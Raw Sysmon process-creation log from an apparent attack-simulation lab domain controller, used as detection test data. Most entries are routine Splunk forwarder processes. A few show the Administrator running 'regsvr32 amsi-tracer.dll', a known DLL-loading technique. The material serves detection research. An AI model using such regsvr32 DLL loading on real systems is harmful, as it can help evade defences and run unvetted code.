AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031630Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:18.527{A8622C2F-48D2-6078-3006-00000000AE01}2176C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:08:17.859{A8622C2F-48D1-6078-2F06-00000000AE01}6800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031610Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:08:17.192{A8622C2F-48D1-6078-2E06-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031452Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:53.781{A8622C2F-48B9-6078-2C06-00000000AE01}6380C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEregsvr32 
amsi-tracer.dllC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000031310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:23.200{A8622C2F-489B-6078-2A06-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031298Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:21.741{A8622C2F-4899-6078-2906-00000000AE01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000031286Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:21.069{A8622C2F-4899-6078-2806-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031276Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:20.348{A8622C2F-4898-6078-2706-00000000AE01}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031266Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:18.519{A8622C2F-4896-6078-2606-00000000AE01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031256Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:17.841{A8622C2F-4895-6078-2506-00000000AE01}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031246Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:17.170{A8622C2F-4895-6078-2406-00000000AE01}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000031103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:11.414{A8622C2F-488F-6078-2106-00000000AE01}3648C:\Windows\ImmersiveControlPanel\SystemSettings.exe10.0.14393.82 (rs1_release.160805-1735)SettingsMicrosoft® Windows® Operating SystemMicrosoft CorporationSystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanelC:\Windows\ImmersiveControlPanel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A91F621A8A0DE91FAE53D3051303809B,SHA256=E768FF1F2F31178FE5930F261ACD4B19464ACC019FB0AA697D0B48686E59050C,IMPHASH=1812A9B9265AD93B24FA9FCBFAFBC4A6{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000031084Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:11.210{A8622C2F-488F-6078-2006-00000000AE01}4896C:\Windows\System32\ApplicationFrameHost.exe10.0.14393.4169 (rs1_release.210107-1130)Application Frame HostMicrosoft® Windows® Operating SystemMicrosoft CorporationApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6F27A494DEAC85725B87BFBC0656A382,SHA256=B93BBD0B6FC7678FD815CC1DAA538F3923C144776CB7C419BC44AF40963E9E89,IMPHASH=3F27A5C187DCE51FC872862DA48D5BCF{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000030888Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:27.822{A8622C2F-4863-6078-1E06-00000000AE01}3472C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEregsvr32 
amsi-tracer.dllC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000030874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:23.186{A8622C2F-485F-6078-1D06-00000000AE01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030861Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:21.652{A8622C2F-485D-6078-1C06-00000000AE01}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000030850Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:21.063{A8622C2F-485D-6078-1B06-00000000AE01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030840Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:20.334{A8622C2F-485C-6078-1A06-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030820Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:18.472{A8622C2F-485A-6078-1906-00000000AE01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030807Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:17.792{A8622C2F-4859-6078-1806-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030798Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:17.156{A8622C2F-4859-6078-1706-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000030667Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:23.169{A8622C2F-4823-6078-1606-00000000AE01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030657Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:21.618{A8622C2F-4821-6078-1506-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030645Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:21.090{A8622C2F-4821-6078-1406-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:20.328{A8622C2F-4820-6078-1306-00000000AE01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030625Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:18.576{A8622C2F-481E-6078-1206-00000000AE01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:05:17.910{A8622C2F-481D-6078-1106-00000000AE01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030606Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:17.138{A8622C2F-481D-6078-1006-00000000AE01}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030528Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:23.173{A8622C2F-47E7-6078-0F06-00000000AE01}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:21.737{A8622C2F-47E5-6078-0E06-00000000AE01}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030503Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:21.077{A8622C2F-47E5-6078-0D06-00000000AE01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:04:20.313{A8622C2F-47E4-6078-0C06-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:18.489{A8622C2F-47E2-6078-0B06-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 